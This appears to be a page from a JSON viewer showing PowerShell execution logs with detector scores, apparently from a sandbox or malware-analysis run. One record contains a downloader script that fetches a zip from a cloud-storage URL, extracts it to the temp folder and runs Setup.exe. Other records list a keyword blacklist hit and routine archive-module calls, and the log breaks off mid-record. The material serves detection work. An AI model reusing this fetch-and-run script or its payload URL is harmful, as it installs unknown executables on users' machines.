Home
Upload
Github
About Us
Blog
Z9 JSON Viewer
Z9 JSON Viewer
[{"eventrecid": "1181097", "time": {"SystemTime": "2024-10-18T10:27:18.1205499Z"}, "totalscore": {"totalscore": 32.390618580814866, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 32.390618580814866, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": ".\\2024-10-18-03_26_17_df7e380cf689832b649826a7e0d4e134.ps1", "removed_backtick": ".\\2024-10-18-03_26_17_df7e380cf689832b649826a7e0d4e134.ps1", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.32390618580814867, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181099", "time": {"SystemTime": "2024-10-18T10:27:18.5150857Z"}, "totalscore": {"totalscore": 113.50519558837637, "score": {"detect_iex": 0, "url_result": 20, "detect_sign": 0, "logistic_reg": 83.50519558837637, "randomized_string": 0, "detect_strings_blacklist": 10}}, "sourcecode": "$webClient = New-Object System.Net.WebClient\n$url1 = \"https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/gopl17.zip\"\n$zipPath1 = \"$env:TEMP\\pgl.zip\" # Fixed variable name and path\n$webClient.DownloadFile($url1, $zipPath1) # Corrected variable references\n$extractPath1 = \"$env:TEMP\\file\"\nExpand-Archive -Path $zipPath1 -DestinationPath $extractPath1 # Consistent variable naming\nStart-Process -FilePath \"$extractPath1\\Setup.exe\" # Ensured correct path to Setup.exe\n", "removed_backtick": "$webClient = New-Object System.Net.WebClient\n$url1 = \"https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/gopl17.zip\"\n$zipPath1 = \"$env:TEMP\\pgl.zip\" # Fixed variable name and path\n$webClient.DownloadFile($url1, $zipPath1) # Corrected variable references\n$extractPath1 = \"$env:TEMP\\file\"\nExpand-Archive -Path $zipPath1 -DestinationPath $extractPath1 # Consistent variable naming\nStart-Process -FilePath \"$extractPath1\\Setup.exe\" # Ensured correct path to Setup.exe\n", "error": {}, "detect_iex": false, "url_result": ["https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c"], "detect_sign": 0, "logistic_reg": 0.8350519558837637, "randomized_string": 0, "detect_strings_blacklist": [{"keyword": "downloadfile", "score": 10}]}, {"eventrecid": "1181105", "time": {"SystemTime": "2024-10-18T10:27:19.5199616Z"}, "totalscore": {"totalscore": 86.88775103759336, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 86.88775103759336, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.Net.WebClient\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.Net.WebClient\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8688775103759336, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181109", "time": {"SystemTime": "2024-10-18T10:27:27.8606968Z"}, "totalscore": {"totalscore": 22.551376089399774, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 22.551376089399774, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\" PathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\n ExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\n InvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\n ArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\n ZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\n DuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\n ArchiveFileIsEmpty=The archive file {0} is empty.\n CompressProgressBarText=The archive file '{0}' creation is in progress...\n ExpandProgressBarText=The archive file '{0}' expansion is in progress...\n AppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\n AddItemtoArchiveFile=Adding '{0}'.\n BadArchiveEntry=Can not process invalid archive entry '{0}'.\n CreateFileAtExpandedPath=Created '{0}'.\n InvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\n InvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\n FileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\n DeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\n InvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\n PreparingToCompressVerboseMessage=Preparing to compress...\n PreparingToExpandVerboseMessage=Preparing to expand...\"\n", "removed_backtick": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\" PathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\n ExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\n InvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\n ArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\n ZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\n DuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\n ArchiveFileIsEmpty=The archive file {0} is empty.\n CompressProgressBarText=The archive file '{0}' creation is in progress...\n ExpandProgressBarText=The archive file '{0}' expansion is in progress...\n AppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\n AddItemtoArchiveFile=Adding '{0}'.\n BadArchiveEntry=Can not process invalid archive entry '{0}'.\n CreateFileAtExpandedPath=Created '{0}'.\n InvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\n InvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\n FileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\n DeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\n InvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\n PreparingToCompressVerboseMessage=Preparing to compress...\n PreparingToExpandVerboseMessage=Preparing to expand...\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.22551376089399774, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181110", "time": {"SystemTime": "2024-10-18T10:27:29.0908842Z"}, "totalscore": {"totalscore": 22.05504632977611, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 22.05504632977611, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "# Localized\t12/07/2019 01:00 AM (GMT)\t303:6.40.20520 \tArchiveResources.psd1\n# Localized ArchiveResources.psd1\n\nConvertFrom-StringData @'\n###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\n'@\n", "removed_backtick": "# Localized\t12/07/2019 01:00 AM (GMT)\t303:6.40.20520 \tArchiveResources.psd1\n# Localized ArchiveResources.psd1\n\nConvertFrom-StringData @'\n###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\n'@\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.2205504632977611, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181112", "time": {"SystemTime": "2024-10-18T10:27:29.3651373Z"}, "totalscore": {"totalscore": 22.551376089399774, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 22.551376089399774, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\"###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\"\n", "removed_backtick": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\"###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.22551376089399774, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181114", "time": {"SystemTime": "2024-10-18T10:27:29.3681903Z"}, "totalscore": {"totalscore": 65.69453226062033, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.69453226062033, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Import-LocalizedData): \"Import-LocalizedData\"\nParameterBinding(Import-LocalizedData): name=\"FileName\"; value=\"ArchiveResources\"\nParameterBinding(Import-LocalizedData): name=\"BindingVariable\"; value=\"LocalizedData\"\n", "removed_backtick": "CommandInvocation(Import-LocalizedData): \"Import-LocalizedData\"\nParameterBinding(Import-LocalizedData): name=\"FileName\"; value=\"ArchiveResources\"\nParameterBinding(Import-LocalizedData): name=\"BindingVariable\"; value=\"LocalizedData\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6569453226062033, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181118", "time": {"SystemTime": "2024-10-18T10:27:33.4045266Z"}, "totalscore": {"totalscore": 61.84808875684497, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 61.84808875684497, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6184808875684498, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181119", "time": {"SystemTime": "2024-10-18T10:27:33.5620033Z"}, "totalscore": {"totalscore": 53.753374143288724, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 53.753374143288724, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Verbose\"; value=\"False\"\nParameterBinding(New-Item): name=\"ErrorAction\"; value=\"Stop\"\n", "removed_backtick": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Verbose\"; value=\"False\"\nParameterBinding(New-Item): name=\"ErrorAction\"; value=\"Stop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5375337414328872, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181121", "time": {"SystemTime": "2024-10-18T10:27:33.9349248Z"}, "totalscore": {"totalscore": 52.604858131117595, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.604858131117595, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "removed_backtick": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5260485813111759, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181123", "time": {"SystemTime": "2024-10-18T10:27:34.0719476Z"}, "totalscore": {"totalscore": 63.15828354343031, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 63.15828354343031, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(GetResolvedPathHelper): \"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"True\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "removed_backtick": "CommandInvocation(GetResolvedPathHelper): \"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"True\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.631582835434303, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181124", "time": {"SystemTime": "2024-10-18T10:27:34.0966956Z"}, "totalscore": {"totalscore": 38.44846395971383, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 38.44846395971383, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Preparing to expand...\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Preparing to expand...\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.38448463959713824, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181126", "time": {"SystemTime": "2024-10-18T10:27:45.2349946Z"}, "totalscore": {"totalscore": 42.851037649569584, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 42.851037649569584, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.42851037649569584, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181128", "time": {"SystemTime": "2024-10-18T10:27:45.2356658Z"}, "totalscore": {"totalscore": 46.41770426554508, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.41770426554508, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46417704265545084, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181130", "time": {"SystemTime": "2024-10-18T10:27:45.3349086Z"}, "totalscore": {"totalscore": 59.17797068248686, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.17797068248686, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "removed_backtick": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5917797068248686, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181132", "time": {"SystemTime": "2024-10-18T10:27:45.3354133Z"}, "totalscore": {"totalscore": 58.61849511566167, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 58.61849511566167, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(GetResolvedPathHelper): \"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"False\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "removed_backtick": "CommandInvocation(GetResolvedPathHelper): \"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"False\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5861849511566167, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181135", "time": {"SystemTime": "2024-10-18T10:27:45.4238430Z"}, "totalscore": {"totalscore": 65.22041929842048, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.22041929842048, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ValidateArchivePathHelper): \"ValidateArchivePathHelper\"\nParameterBinding(ValidateArchivePathHelper): name=\"archiveFile\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\n", "removed_backtick": "CommandInvocation(ValidateArchivePathHelper): \"ValidateArchivePathHelper\"\nParameterBinding(ValidateArchivePathHelper): name=\"archiveFile\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6522041929842048, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181138", "time": {"SystemTime": "2024-10-18T10:27:45.8652144Z"}, "totalscore": {"totalscore": 67.02596314275281, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 67.02596314275281, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression\"\n", "removed_backtick": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6702596314275281, "randomized_string": 0, 